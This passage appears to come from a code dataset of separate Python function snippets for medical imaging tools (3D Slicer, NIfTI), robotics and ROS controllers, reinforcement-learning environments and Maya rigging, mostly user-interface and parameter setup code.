self.generateDataCsvCheckBox)\n\n\n #\n # Name of the segmentation to save\n #\n self.saveSegmentationName = qt.QLineEdit()\n self.saveSegmentationName.textChanged.connect(self.onSaveSegmentationFileChange)\n parametersFormLayout.addRow(\"Segmentation name:\", self.saveSegmentationName) \n\n #\n # Save segmentationButton Button\n #\n self.saveSegmentationButton = qt.QPushButton(\"Save segmentation\")\n self.saveSegmentationButton.toolTip = \"Save this segmentation with used parameters.\"\n parametersFormLayout.addRow(self.saveSegmentationButton) \n\n #\n # Add vertical spacing\n # \n verticalSpacer = qt.QSpacerItem(0, 30, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n parametersFormLayout.addItem(verticalSpacer)\n\n horizontalLayout = qt.QHBoxLayout()\n self.segmentationLoadLabelText = qt.QLabel()\n self.segmentationLoadLabelText.text = \"Segmentation files:\"\n horizontalLayout.addWidget(self.segmentationLoadLabelText)\n \n #\n # Segmentation files \n # \n self.segmentationFilesComboBox = qt.QComboBox() \n self.segmentationFilesComboBox = self.fillComboBox(self.segmentationFilesComboBox, self.segmentationsPath, \".seg.nrrd\")\n horizontalLayout.addWidget(self.segmentationFilesComboBox)\n parametersFormLayout.addRow(horizontalLayout)\n \n #\n # Load segmentationButton Button\n #\n self.loadSegmentationButton = qt.QPushButton(\"Load segmentation\")\n self.loadSegmentationButton.toolTip = \"Load the segmenation from this file.\"\n parametersFormLayout.addRow(self.loadSegmentationButton) \n #end region\n \n\n #\n #region Connections & Shortcuts\n #\n # self.loadBrainVolumeButton.connect('clicked(bool)', self.onLoadBrainVolumeButton)\n # self.loadCustomVolumeButton.connect('clicked(bool)', self.onLoadCustomVolumeButton)\n \n self.clearButton.connect('clicked(bool)', self.onClearButton)\n self.clearOrganButton.connect('clicked(bool)', self.onClearOrganButton)\n self.segmentButton.connect('clicked(bool)', self.onSegmentButton)\n self.saveSegmentationButton.connect('clicked(bool)', self.onSaveSegmentationButton)\n self.loadSegmentationButton.connect('clicked(bool)', self.onLoadSegmentationButton)\n self.saveMarkersButton.connect('clicked(bool)', self.onSaveMarkersButton)\n self.loadMarkersButton.connect('clicked(bool)', self.onLoadMarkersButton)\n self.inputSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelect)\n \n # Keyboard shortcut bind: press ctrl button to add markup \n markupShortcut = qt.QShortcut(slicer.util.mainWindow())\n markupShortcut.setKey( qt.QKeySequence(\"w\") )\n markupShortcut.connect('activated()', self.addMarkupcallback)\n \n markupShortcut = qt.QShortcut(slicer.util.mainWindow())\n markupShortcut.setKey( qt.QKeySequence(\"x\") )\n markupShortcut.connect('activated()', self.addBgMarkupcallback)\n #endregion \n\n # Refresh Apply button state\n self.onSelect()\n \n # Refresh segmentation save button state\n self.onSaveSegmentationFileChange()", "def init_turn(self):\n sender = self.sender()\n cur_settings = self.setting_dropdown.currentText()\n\n if sender:\n cur_disp = self.rad_grp.checkedButton()\n self.start_frm = self.start_frm_le.text()\n self.end_frm = self.end_frm_le.text()\n file_path = self.save_loc.text()\n if self.arg_check():\n\n wireframe = self.wireframe\n # Instantiate the tool logic with the selected values.\n start_turn = tl.Turntable(cur_disp.objectName(),\n self.start_frm,\n self.end_frm,\n file_path,\n wireframe)\n\n # If discipline is surface, set render settings.\n if cur_disp.objectName() == 'surface':\n set_turn = tl.RenderTurntable()\n set_turn.set_render_settings(cur_settings,self.start_frm,self.end_frm)\n\n start_turn.launch_tool()", "def load_params(self, event):\n \n self.robot_type = rospy.get_param(\"robot_type\" , 'pendulum' )\n self.robot_config = rospy.get_param(\"robot_config\", 'wrist-only' )\n self.robot_ctl = rospy.get_param(\"controller\", 'RfixCTC' )\n self.fixed_mode = rospy.get_param(\"fixed_mode\", 1 )\n \n \n ###############################################\n # Load robot model for the right configuration\n if self.robot_config == 'wrist-only':\n self.R = Proto.SingleRevoluteDSDM()\n \n elif self.robot_config == 'dual-plane' :\n self.R = Proto.TwoPlanarSerialDSDM()\n \n else:\n self.R = None\n \n ###############################################\n # Load controller\n if self.robot_ctl == 'RfixCTC' :\n self.Ctl = RminCTC.RfixComputedTorqueController( self.R , self.fixed_mode )\n \n elif self.robot_ctl == 'RminCTC' :\n self.Ctl = RminCTC.RminComputedTorqueController( self.R )\n \n elif self.robot_ctl == 'RfixSLD' :\n self.Ctl = RminCTC.RfixSlidingModeController( self.R , self.fixed_mode )\n \n elif self.robot_ctl == 'RminSLD' :\n self.Ctl = RminCTC.RminSlidingModeController( self.R )\n \n elif self.robot_ctl == 'RollCTC' :\n self.Ctl = RollCTC.RolloutComputedTorqueController( self.R )\n \n elif self.robot_ctl == 'RollSLD' :\n self.Ctl = RollCTC.RolloutSlidingModeController( self.R )\n \n else:\n self.Ctl = None\n \n \n if self.robot_config == 'wrist-only':\n self.Ctl.n_gears = rospy.get_param(\"n_gears\", 2 )\n self.x_d = np.array( rospy.get_param(\"goal\", [0,0] ) )\n \n elif self.robot_config == 'dual-plane' :\n self.Ctl.n_gears = rospy.get_param(\"n_gears\", 4 )\n self.x_d = np.array( rospy.get_param(\"goal\", [0.0,0.0,0.0,0.0] ) )\n #self.x_d = np.array( [-3.14 , 0 , 0 , 0] )\n \n # Gen ctl params\n self.Ctl.hysteresis = rospy.get_param(\"hysteresis\", True )\n self.Ctl.min_delay = rospy.get_param(\"min_delay\", 0.5 )\n \n self.Ctl.w0 = rospy.get_param(\"w0\", 1 )\n self.Ctl.zeta = rospy.get_param(\"zeta\", 0.7 )\n \n self.Ctl.lam = rospy.get_param(\"lam\", 1 )\n self.Ctl.nab = rospy.get_param(\"nab\", 1 )\n self.Ctl.D = rospy.get_param(\"D\", 0 )\n \n self.Ctl.horizon = rospy.get_param(\"horizon\", 0.5 )\n self.Ctl.sim_dt = rospy.get_param(\"sim_dt\", 0.1 )\n \n self.Ctl.domain_check = rospy.get_param(\"domain_check\", False )\n \n # Base policy param for roll \n if self.robot_ctl == 'RollCTC' :\n self.Ctl.FixCtl.lam = self.Ctl.lam\n \n elif self.robot_ctl == 'RollSLD' :\n self.Ctl.FixCtl.lam = self.Ctl.lam \n self.Ctl.FixCtl.nab = self.Ctl.nab \n self.Ctl.FixCtl.D = self.Ctl.D", "def __init__(self):\n ros_ws_abspath = rospy.get_param(\"/drone/ros_ws_abspath\", None)\n assert ros_ws_abspath is not None, \"You forgot to set ros_ws_abspath in your yaml file of your main RL script. Set ros_ws_abspath: \\'YOUR/SIM_WS/PATH\\'\"\n assert os.path.exists(ros_ws_abspath), \"The Simulation ROS Workspace path \" + ros_ws_abspath + \\\n \" DOESNT exist, execute: mkdir -p \" + ros_ws_abspath + \\\n \"/src;cd \" + ros_ws_abspath + \";catkin_make\"\n\n ROSLauncher(rospackage_name=\"drone_construct\",\n launch_file_name=\"start_world.launch\",\n ros_ws_abspath=ros_ws_abspath)\n\n # Load Params from the desired Yaml file\n LoadYamlFileParamsTest(rospackage_name=\"openai_ros\",\n rel_path_from_package_to_file=\"src/openai_ros/task_envs/parrotdrone/config\",\n yaml_file_name=\"parrotdrone_goto.yaml\")\n\n # Only variable needed to be set here\n number_actions = rospy.get_param('/drone/n_actions')\n self.action_space = spaces.Discrete(number_actions)\n\n # We set the reward range, which is not compulsory but here we do it.\n self.reward_range = (-numpy.inf, numpy.inf)\n\n # Actions and Observations\n self.linear_forward_speed = rospy.get_param(\n '/drone/linear_forward_speed')\n self.angular_turn_speed = rospy.get_param('/drone/angular_turn_speed')\n self.angular_speed = rospy.get_param('/drone/angular_speed')\n\n self.init_linear_speed_vector = Vector3()\n self.init_linear_speed_vector.x = rospy.get_param(\n '/drone/init_linear_speed_vector/x')\n self.init_linear_speed_vector.y = rospy.get_param(\n '/drone/init_linear_speed_vector/y')\n self.init_linear_speed_vector.z = rospy.get_param(\n '/drone/init_linear_speed_vector/z')\n\n self.init_angular_turn_speed = rospy.get_param(\n '/drone/init_angular_turn_speed')\n\n self.min_sonar_value = rospy.get_param('/drone/min_sonar_value')\n self.max_sonar_value = rospy.get_param('/drone/max_sonar_value')\n\n # Get WorkSpace Cube Dimensions\n self.work_space_x_max = rospy.get_param(\"/drone/work_space/x_max\")\n self.work_space_x_min = rospy.get_param(\"/drone/work_space/x_min\")\n self.work_space_y_max = rospy.get_param(\"/drone/work_space/y_max\")\n self.work_space_y_min = rospy.get_param(\"/drone/work_space/y_min\")\n self.work_space_z_max = rospy.get_param(\"/drone/work_space/z_max\")\n self.work_space_z_min = rospy.get_param(\"/drone/work_space/z_min\")\n\n # Maximum RPY values\n self.max_roll = rospy.get_param(\"/drone/max_roll\")\n self.max_pitch = rospy.get_param(\"/drone/max_pitch\")\n self.max_yaw = rospy.get_param(\"/drone/max_yaw\")\n\n # Get Desired Point to Get\n self.desired_point = Point()\n self.desired_point.x = rospy.get_param(\"/drone/desired_pose/x\")\n self.desired_point.y = rospy.get_param(\"/drone/desired_pose/y\")\n self.desired_point.z = rospy.get_param(\"/drone/desired_pose/z\")\n\n self.desired_point_epsilon = rospy.get_param(\n \"/drone/desired_point_epsilon\")\n\n # We place the Maximum and minimum values of the X,Y,Z,R,P,Yof the pose\n\n high = numpy.array([self.work_space_x_max,\n self.work_space_y_max,\n self.work_space_z_max,\n self.max_roll,\n self.max_pitch,\n self.max_yaw,\n self.max_sonar_value])\n\n low = numpy.array([self.work_space_x_min,\n self.work_space_y_min,\n self.work_space_z_min,\n -1*self.max_roll,\n -1*self.max_pitch,\n -numpy.inf,\n self.min_sonar_value])\n\n self.observation_space = spaces.Box(low, high)\n\n rospy.logdebug(\"ACTION SPACES TYPE===>\"+str(self.action_space))\n rospy.logdebug(\"OBSERVATION SPACES TYPE===>\" +\n str(self.observation_space))\n\n # Rewards\n self.closer_to_point_reward = rospy.get_param(\n \"/drone/closer_to_point_reward\")\n self.not_ending_point_reward = rospy.get_param(\n \"/drone/not_ending_point_reward\")\n self.end_episode_points = rospy.get_param(\"/drone/end_episode_points\")\n\n self.cumulated_steps = 0.0\n\n # Here we will add any init functions prior to starting the MyRobotEnv\n super(ParrotDroneGotoEnv, self).__init__(ros_ws_abspath)", "def __init__(self, env, action_repeat=1):\n super().__init__(env)\n if self.env.mujoco_robot.name == \"sawyer\":\n from robosuite.controllers import SawyerIKController\n\n self.controller = SawyerIKController(\n bullet_data_path=os.path.join(robosuite.models.assets_root, \"bullet_data\"),\n robot_jpos_getter=self._robot_jpos_getter,\n )\n elif self.env.mujoco_robot.name == \"baxter\":\n from robosuite.controllers import BaxterIKController\n\n self.controller = BaxterIKController(\n bullet_data_path=os.path.join(robosuite.models.assets_root, \"bullet_data\"),\n robot_jpos_getter=self._robot_jpos_getter,\n )\n else:\n raise Exception(\n \"Only Sawyer and Baxter robot environments are supported for IK \"\n \"control currently.\"\n )\n\n self.action_repeat = action_repeat", "def __init__(self, source, label_config_center, name=None, header=None, \n view_min=None, view_max=None, alpha=255, colormap='gray',\n cross_pos=None):\n if isinstance(source, np.ndarray):\n self._data = np.rot90(source)\n if name == None:\n self._name = 'new_image'\n else:\n self._name = str(name)\n if not isinstance(header, nib.nifti1.Nifti1Header):\n raise ValueError(\"Parameter header must be specified!\")\n elif header.get_data_shape() == source.shape:\n self._header = header\n self._img = None\n else:\n raise ValueError(\"Data dimension does not match.\")\n else:\n self._img = nib.load(source)\n self._header = self._img.get_header()\n basename = os.path.basename(source.strip('/'))\n self._name = re.sub(r'(.*)\\.nii(\\.gz)?', r'\\1', basename)\n self.save_mem_load()\n\n # For convenience, define a shift variable\n self._y_shift = self.get_data_shape()[1] - 1\n\n if view_min == None:\n self._view_min = self._data.min()\n else:\n self._view_min = view_min\n\n if view_max == None:\n self._view_max = self._data.max()\n else:\n self._view_max = view_max\n\n self._alpha = alpha\n self._colormap = colormap\n self._rgba_list = range(self.get_data_shape()[2])\n \n # bool status for the item\n self._visible = True\n if len(self.get_data_shape()) == 3:\n self._4d = False\n else:\n self._4d = True\n self._time_point = 0\n\n # temporal variant for OrthView\n self._cross_pos = cross_pos\n\n # define a dictionary \n self.label_config_center = label_config_center\n self.label_config_center.single_roi_view_update.connect(self.update_single_roi)\n \n # undo redo stacks\n self.undo_stack = DoStack()\n self.redo_stack = DoStack()\n\n self.update_rgba()\n if self._cross_pos:\n self.update_orth_rgba()", "def __init__(self):\n self.brainstate = {}\n\n self.export = ['run_ai']", "def setup(self):\r\n ScriptedLoadableModuleWidget.setup(self)\r\n\r\n # Load widget from .ui file (created by Qt Designer).\r\n # Additional widgets can be instantiated manually and added to self.layout.\r\n uiWidget = slicer.util.loadUI(self.resourcePath('UI/RecordHerniaData.ui'))\r\n self.layout.addWidget(uiWidget)\r\n self.ui = slicer.util.childWidgetVariables(uiWidget)\r\n\r\n # Set scene in MRML widgets. Make sure that in Qt designer the top-level qMRMLWidget's\r\n # \"mrmlSceneChanged(vtkMRMLScene*)\" signal in is connected to each MRML widget's.\r\n # \"setMRMLScene(vtkMRMLScene*)\" slot.\r\n uiWidget.setMRMLScene(slicer.mrmlScene)\r\n\r\n # Create logic class. Logic implements all computations that should be possible to run\r\n # in batch mode, without a graphical user interface.\r\n self.logic = TMSRecordDataModuleLogic()\r\n self.recordingStarted = False\r\n self.camerasStarted = False\r\n self.moduleDir = os.path.dirname(slicer.modules.tmsrecorddatamodule.path)\r\n self.logic.setupScene()\r\n\r\n # Buttons\r\n self.ui.StartStopRecordingButton.connect('clicked(bool)', self.onStartStopRecordingClicked)\r\n self.ui.startCamerasButton.connect('clicked(bool)',self.onStartStopCamerasClicked)", "def setup(args):\n cfg = get_cfg()\n\n cfg.merge_from_file(model_zoo.get_config_file(args.model_zoo))\n cfg.DATASETS.TRAIN = (args.train_dataset, )\n cfg.DATASETS.TEST = (args.test_dataset, )\n cfg.DATALOADER.NUM_WORKERS = args.num_workers\n cfg.OUTPUT_DIR = args.output_dir\n os.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\n\n cfg.image_w = args.size[0]\n cfg.image_h = args.size[1]\n\n cfg.MODEL.WEIGHTS = args.model_zoo_weights\n cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = args.roi_thresh # set a custom testing threshold\n\n default_setup(cfg, args)\n return cfg", "def loadData(self, data=None):\n\n super(SimpleControlComponentRig, self).loadData( data )\n\n ctrlSize = data.get('ctrlSize', 1.0)\n ctrlXfo = data.get('ctrlXfo', Xfo())\n\n # ================\n # Resize Controls\n # ================\n self.mainCtrl.setShape('square')\n self.mainCtrl.rotatePoints(90, 0, 0)\n self.mainCtrl.scalePoints(Vec3(ctrlSize, ctrlSize, ctrlSize))\n\n # =======================\n # Set Control Transforms\n # =======================\n self.mainCtrlSpace.xfo = ctrlXfo\n self.mainCtrl.xfo = ctrlXfo\n\n # ============\n # Set IO Xfos\n # ============\n self.mainInputTgt.xfo = ctrlXfo\n self.mainDef.xfo = ctrlXfo\n self.outputTgt.xfo = ctrlXfo\n\n # ====================\n # Evaluate Constraints\n # ====================\n self.mainInputConstraint.evaluate()\n self.mainOutputConstraint.evaluate()\n self.mainDefConstraint.evaluate()\n\n # ====================\n # Evaluate Canvas Ops\n # ====================", "def __init__(self, env):\n super(PlayerOneNetworkControllerWrapper, self).__init__(env)\n buttons = [\"B\", \"A\", \"MODE\", \"START\", \"UP\", \"DOWN\", \"LEFT\", \"RIGHT\", \"C\", \"Y\", \"X\", \"Z\"]\n actions = [['LEFT'], ['RIGHT'], ['LEFT', 'DOWN'], ['RIGHT', 'DOWN'],['LEFT', 'UP'],['RIGHT', 'UP'],\n ['DOWN', 'B'],['LEFT', 'UP'],['RIGHT', 'DOWN','B'],['RIGHT', 'DOWN','A'],\n ['RIGHT', 'UP','B'],['RIGHT', 'UP','A'],['RIGHT', 'UP','C'],\n ['LEFT', 'UP','B'],['LEFT', 'UP','A'],['LEFT', 'UP','C'],\n ['C'],['START'], ['B'],['Y'],['X'],['Z'],['A'],['UP'],['MODE']]\n self._actions = []\n for action in actions:\n arr = np.array([False] * 12)\n for button in action:\n arr[buttons.index(button)] = True\n self._actions.append(arr)\n self.action_space = gym.spaces.Discrete(len(self._actions))", "def handle(self, args, unknown):\n\n settings = Dict2Obj(**runpy.run_path(\"%s/%s\" % (os.getcwd(), 'settings.py')))\n project_name = os.getcwd().split('/')[-1]\n extra_args = self.parse_unknown(unknown)\n Train(project_name=project_name, settings=settings, args=args, **extra_args).begin()", "def build_guide(self, **kwargs):\n\n # This builds your guide master and updates your options\n self.create_guide_master(**kwargs)\n\n prefix = self.prefix # Naming prefix. Use this for every new node you create and there should be no name clashes.\n options = self.options # Build options\n mirror_value = self.mirror_value # 1.0 for left and center sided parts and -1.0 for right sided part.\n\n mc.setAttr(self.guide_master+'.offsetTranslateY', -0.2)\n\n l_prefix = prefix.replace('C','L', 1)\n r_prefix = prefix.replace('C','R', 1)\n mirror_values = [1, -1]\n enable_steering = options.get('enableSteering')\n\n colors = ['green', 'red']\n\n for mi, prefix in enumerate([l_prefix, r_prefix]):\n\n mirror_value = mirror_values[mi]\n color = colors[mi]\n\n l_main_zero, l_main_plc = self.guide_joint('main', alt_prefix=prefix, placer_only=1)\n\n # create hub\n hub_zero, hub_plc, hub_jnt = self.guide_joint('wheelhub', alt_prefix=prefix, constraint_type='point')\n hub_end_zero, hub_end_plc, hub_end_jnt = self.guide_joint('wheelhub_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(hub_end_zero, r=1, t=[1,0,0])\n mc.parent(hub_end_jnt, hub_jnt)\n mc.aimConstraint(hub_end_plc, hub_jnt, aim=[mirror_value,0,0], u=[0,1,0], wu=[0,1,0], wut='vector')\n mc.parentConstraint(hub_plc, hub_end_zero , mo=1)\n\n # Create steering arm\n steer_zero, steer_plc, steer_jnt = self.guide_joint('steeringArm', alt_prefix=prefix, constraint_type='parent')\n mc.xform(steer_zero, r=1, t=[-1,0,0])\n mc.parent(hub_jnt, steer_jnt)\n\n # Create shocks\n shock_a_zero, shock_a_plc, shock_a_jnt = self.guide_joint('shock_A', alt_prefix=prefix, constraint_type='point')\n shock_b_zero, shock_b_plc, shock_b_jnt = self.guide_joint('shock_B', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(shock_a_zero, ws=1, t=[-2,2,0])\n mc.xform(shock_b_zero, ws=1, t=[-0.5,0.25,0])\n\n mc.parent(shock_b_jnt, shock_a_jnt)\n\n mc.aimConstraint(shock_b_plc, shock_a_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n mc.aimConstraint(shock_a_plc, shock_b_jnt, aim=[-mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n\n # upper arm\n up_arm_zero, up_arm_plc, up_arm_jnt = self.guide_joint('upperArm', alt_prefix=prefix, constraint_type='point')\n up_arm_end_zero, up_arm_end_plc, up_arm_end_jnt = self.guide_joint('upperArm_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(up_arm_end_zero, r=1, t=[-3.5,1,0])\n mc.xform(up_arm_zero, r=1, t=[-1,0.5,0])\n mc.parent(up_arm_end_jnt, up_arm_jnt)\n mc.aimConstraint(up_arm_end_plc, up_arm_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,mirror_value], wut='objectRotation', wuo=up_arm_plc)\n\n # lower arm\n lo_arm_zero, lo_arm_plc, lo_arm_jnt = self.guide_joint('lowerArm', alt_prefix=prefix, constraint_type='point')\n lo_arm_end_zero, lo_arm_end_plc, lo_arm_end_jnt = self.guide_joint('lowerArm_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(lo_arm_end_zero, r=1, t=[-4,-0.5,0])\n mc.xform(lo_arm_zero, r=1, t=[-1,-0.5,0])\n mc.parent(lo_arm_end_jnt, lo_arm_jnt)\n mc.aimConstraint(lo_arm_end_plc, lo_arm_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,mirror_value], wut='objectRotation', wuo=lo_arm_plc)\n\n # steeringArm\n if enable_steering:\n steeringArm_a_zero, steeringArm_a_plc, steeringArm_a_jnt = self.guide_joint('steeringArm_A', alt_prefix=prefix, constraint_type='point')\n steeringArm_b_zero, steeringArm_b_plc, steeringArm_b_jnt = self.guide_joint('steeringArm_B', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(steeringArm_b_zero, r=1, t=[-1.5,0,1])\n mc.xform(steeringArm_a_zero, r=1, t=[-4,0,1])\n\n mc.parent(steeringArm_b_jnt, steeringArm_a_jnt)\n mc.aimConstraint(steeringArm_b_plc, steeringArm_a_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n\n # Create control\n zero, ctrl = self.guide_ctrl('wheel', alt_prefix=prefix, driver=hub_end_jnt, color=color, shape='circle', axis='X', scale=[3]*3, create_pivot=0)\n mc.setAttr(ctrl+'.numOffsetCtrls', 1)\n mc.addAttr(ctrl+'.numOffsetCtrls', e=1, min=1)\n mc.xform(ctrl.replace('_CTL','_A_OFF_CTL.cv[*]'), r=1, s=[0.8]*3)\n\n control.create_shape('wheel', ctrl, axis='X', scale=[3]*3)\n\n #suspension_zero, suspension_ctrl = self.guide_ctrl('suspension', create_pivot=0, driver=shock_a_jnt, axis='X', shape='pyramid', color=color, scale=[1.5,1,1], alt_prefix=prefix)\n ground_zero, ground_ctrl = self.guide_ctrl('ground', create_pivot=0, shape='square', color='grass', alt_prefix=prefix)\n mc.delete(mc.pointConstraint(hub_jnt, ground_zero))\n\n # constraint to placer\n childs = [prefix+'_wheelhub_JNT_PLC_ZERO',\n prefix+'_steeringArm_JNT_PLC_ZERO',\n prefix+'_shock_A_JNT_PLC_ZERO',\n prefix+'_shock_B_JNT_PLC_ZERO',\n prefix+'_upperArm_JNT_PLC_ZERO',\n prefix+'_upperArm_end_JNT_PLC_ZERO',\n prefix+'_lowerArm_JNT_PLC_ZERO',\n prefix+'_lowerArm_end_JNT_PLC_ZERO']\n\n for c in childs:\n mc.parentConstraint(l_main_plc, c, mo=1)\n\n mc.setAttr(l_main_plc+'.offsetTranslateY', mirror_value*0.5)\n\n # ################3\n # Place it all\n hub_pos = mc.ls(options.get('hubCenter') or '')\n if hub_pos:\n loc = utils.snap_locator(hub_pos)\n mc.delete(mc.pointConstraint(loc, self.guide_master))\n mc.setAttr(self.guide_master+'.tx', 0)\n mc.delete(mc.pointConstraint(loc, l_main_plc), loc)\n\n hub_end_pos = mc.ls(options.get('hubEndCenter') or '')\n if hub_end_pos:\n loc = utils.snap_locator(hub_end_pos)\n mc.delete(mc.pointConstraint(loc, hub_end_plc), loc)\n\n else:\n mc.xform(self.guide_master, ws=1, t=[0,2,10])\n mc.xform(l_main_plc, r=1, t=[mirror_value*6,0,0])\n\n mc.setAttr(self.guide_master+'.jointAxisVis', 1)\n\n l = utils.snap_locator(hub_jnt)\n mc.setAttr(l+'.ty', 0)\n mc.delete(mc.pointConstraint(l, ground_zero), l)\n\n chassis_plc_zero, chassis_plc = self.guide_joint('chassis_driver', placer_only=1)\n mc.setAttr(chassis_plc+'.radius', 1)\n mc.setAttr(chassis_plc+'.color', 0.96, 0.71, .01)\n mc.setAttr(chassis_plc+'.otherType', 'Leg IK Driver', type='string');\n mc.setAttr(chassis_plc+'.type', 18)\n\n mc.pointConstraint(l_prefix+'_lowerArm_end_JNT_PLC', r_prefix+'_lowerArm_end_JNT_PLC', chassis_plc_zero)\n utils.set_attrs(chassis_plc, l=1, k=0)\n\n # This finalizes your guide.\n self.finalize_guide()\n self.mirror_guide()", "def loadDefault(self):\n self.addStart()", "def importMasterSettings(self):\n\t\tpickleData = pickle.load( open( self.masterPath.path, \"rb\" ) )\n\t\tmaster = rlayer.RenderLayer( 'defaultRenderLayer' )\n\t\tmaster.makeCurrent()\n\t\tfor a in pickleData.keys():\n\t\t\ttry:\n\t\t\t\ta.v = pickleData[a]\n\t\t\texcept:\n\t\t\t\tcontinue", "def set_default_params(self):\n print('------------------')\n print('Setting default parameters with file ', self.input_file_name)\n if 'ssephem' not in self.__dict__:\n self.__dict__['ssephem'] = 'DE436'\n print('Setting default Solar System Ephemeris: DE436')\n if 'clock' not in self.__dict__:\n self.__dict__['clock'] = None\n print('Setting a default Enterprise clock convention (check the code)')\n if 'setupsamp' not in self.__dict__:\n self.__dict__['setupsamp'] = False\n if 'psrlist' in self.__dict__:\n self.psrlist = np.loadtxt(self.psrlist, dtype=np.unicode_)\n print('Only using pulsars from psrlist')\n else:\n self.__dict__['psrlist'] = []\n print('Using all available pulsars from .par/.tim directory')\n if 'psrcachefile' not in self.__dict__:\n self.psrcachefile = None\n if 'tm' not in self.__dict__:\n self.tm = 'default'\n print('Setting a default linear timing model')\n if 'inc_events' not in self.__dict__:\n self.inc_events = True\n print('Including transient events to specific pulsar models')\n if 'fref' not in self.__dict__:\n self.fref = 1400 # MHz\n print('Setting reference radio frequency to 1400 MHz')\n if 'mcmc_covm_csv' in self.__dict__ and os.path.isfile(self.mcmc_covm_csv):\n print('MCMC jump covariance matrix is available')\n self.__dict__['mcmc_covm'] = pd.read_csv(self.mcmc_covm_csv, index_col=0)\n else:\n self.__dict__['mcmc_covm'] = None\n # Copying default priors from StandardModels/CustomModels object\n # Priors are chosen not to be model-specific because HyperModel\n # (which is the only reason to have multiple models) does not support\n # different priors for different models\n for prior_key, prior_default in self.noise_model_obj().priors.items():\n if prior_key not in self.__dict__.keys():\n self.__dict__[prior_key] = prior_default\n\n # Model-dependent parameters\n for mkey in self.models:\n\n self.models[mkey].modeldict = dict()\n\n print('------------------')", "def set_up_scenes():\n cmd.zoom('Cathepsin', 10) # Zoom out to get a view on the whole complex\n cmd.scene('001', 'store', message='This is the first scene with a view on the complex!')\n cmd.set_view(closeup) # Get a close-up of the ligand by using the manually chosen viewpoint\n cmd.scene('002', 'store', message='This is the second scene with a close-up on the ligand!')", "def setup_populated_instr_McXtrace():\n instr = setup_instr_root_path_McXtrace()\n\n instr.add_parameter(\"double\", \"theta\")\n instr.add_parameter(\"double\", \"has_default\", value=37)\n instr.add_declare_var(\"double\", \"two_theta\")\n instr.append_initialize(\"two_theta = 2.0*theta;\")\n\n instr.add_component(\"first_component\", \"test_for_reading\")\n instr.add_component(\"second_component\", \"test_for_reading\")\n instr.add_component(\"third_component\", \"test_for_reading\")\n\n return instr", "def set_parameters(self, args):\n self.args = args\n\n if args.testing:\n self.delay_close()\n\n if args.source == \"simulation\":\n log.info(\"Create simulated spectra device\")\n self.dev = simulation.SimulatedSpectraDevice()\n\n elif args.source == \"sled\":\n log.info(\"Create single sled cobra\")\n self.dev = simulation.SimulatedCobraSLED()\n\n elif args.source == \"cobra\":\n log.info(\"Create DALSA cobra device\")\n #self.dev = devices.DalsaCobraDevice()\n self.dev = DALSA.Cobra()\n\n elif args.source == \"opto\":\n log.info(\"Create OPTO sensor cobra device\")\n self.dev = DALSA.OPTOCobra()\n\n elif args.source == \"basler\":\n log.info(\"Create DALSA basler device\")\n #self.dev = devices.DalsaBaslerDevice()\n self.dev = DALSA.BaslerSprint4K()\n\n self.dev.setup_pipe()\n self.setup_pipe_timer()", "def __init__(self):\r\n ScriptedLoadableModuleLogic.__init__(self)\r\n self.rgbport = 18944\r\n self.depthPort = 18945", "def __init__(self, io, default_camera='right'):\n parts.part.ReachyPart.__init__(self, name='head', io=io)\n\n #self.neck = self.create_orbita_actuator('neck', Head.orbita_config)\n self.attach_dxl_motors(parts.Head.dxl_motors)\n #self.camera = self.io.find_dual_camera(default_camera)", "def __set_control_elements(*args):\n args[0].Controls.valve_number = args[1]\n args[0].Controls.set_valve_number()\n args[0].Controls.go_elements = args[2]\n args[0].Controls.set_go_elements()", "def import_control_section(self, filename_suffix='run'):\n pass", "def __setup_ui_controls(self, list_of_names):\n\n ##################################################\n self.scene.append_to_caption('<h3>Scene Settings</h3>\\n')\n # Button to reset camera\n reset_button = button(\n bind=self.__reset_camera, text=\"Reset Camera\")\n self.__ui_controls.btn_reset = reset_button\n self.scene.append_to_caption('\\t')\n\n screenshot_button = button(bind=self.__screenshot, text=\"Take Screenshot\")\n self.__ui_controls.btn_ss = screenshot_button\n self.scene.append_to_caption('\\n')\n\n camera_lock_checkbox = checkbox(bind=self.__camera_lock_checkbox, text=\"Camera Lock\",\n checked=self.__camera_lock)\n self.__ui_controls.chkbox_cam = camera_lock_checkbox\n self.scene.append_to_caption('\\t')\n\n grid_relative_checkbox = checkbox(\n bind=self.__grid_relative_checkbox,\n text=\"Grid Relative\", checked=self.__grid_relative)\n self.__ui_controls.chkbox_rel = grid_relative_checkbox\n\n self.scene.append_to_caption('\\t')\n # Checkbox for grid visibility\n checkbox_grid_visibility = checkbox(\n bind=self.__grid_visibility_checkbox, text=\"Grid Visibility\",\n checked=self.__grid_visibility)\n self.__ui_controls.chkbox_grid = checkbox_grid_visibility\n self.scene.append_to_caption('\\n')\n\n ##################################################\n self.scene.append_to_caption('<h3>Robot</h3>\\n')\n # Drop down for robots / joints in frame\n menu_robots_list = menu(bind=self.__menu_item_chosen, choices=list_of_names)\n if not len(list_of_names) == 0:\n menu_robots_list.index = self.__selected_robot\n self.__ui_controls.menu_robots = menu_robots_list\n self.scene.append_to_caption('\\t')\n\n # Button to delete the selected robot\n delete_button = button(bind=self.__del_robot, text=\"Delete Robot\")\n self.__ui_controls.btn_del = delete_button\n self.scene.append_to_caption('\\t')\n\n # Button to clear the robots in screen\n clear_button = button(bind=self.clear_scene, text=\"Clear Scene\")\n self.__ui_controls.btn_clr = clear_button\n self.scene.append_to_caption('\\n')\n\n ##################################################\n self.scene.append_to_caption('<h3>Characteristics</h3>\\n')\n # Checkbox for reference frame visibilities\n if len(self.__robots) == 0:\n reference_checkbox = checkbox(\n bind=self.__reference_frame_checkbox,\n text=\"Show Reference Frames\", checked=True)\n else:\n chk = self.__robots[self.__selected_robot].ref_shown\n reference_checkbox = checkbox(\n 